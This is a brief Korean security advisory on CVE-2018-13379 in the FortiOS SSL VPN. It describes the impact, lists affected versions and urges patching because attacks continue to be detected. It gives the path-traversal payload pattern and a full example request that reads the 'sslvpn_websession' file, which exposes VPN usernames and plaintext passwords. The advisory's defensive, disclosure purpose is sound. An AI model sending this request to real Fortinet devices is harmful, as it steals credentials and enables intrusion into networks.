FortiOS 취약점 CVE-2018-13379

Fortinet FortiOS SSL VPN 자격 증명 노출 취약성

 

1) 영향

- 악용할 경우 공격자가 Fortinet VPN에서 민감한 "sslvpn_websession" 파일에 접근하도록 허용할 수 있음

- 이 파일은 세션 관련 정보가 포함되어 있으며 Fortinet VPN 사용자의 계정명과 비밀번호가 평문 상태로 공개될 수 있음

 

2) 취약점 페이로드

- [Target IP]/remote/fgt_lang?lang=/../ 패턴

 

3) 공격 예시

- [Target IP]/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

 

4)  영향 받는 버전(SSL VPN이 활성화된 경우에만 영향)

- FortiOS 6.0.0 ~ 6.0.4

- FortiOS 5.6.3 ~ 5.6.7

- FortiOS 5.4.6 ~ 5.4.12

※ 현재까지(2023.04) 계속 공격 탐지되고 있으므로 패치 필수!!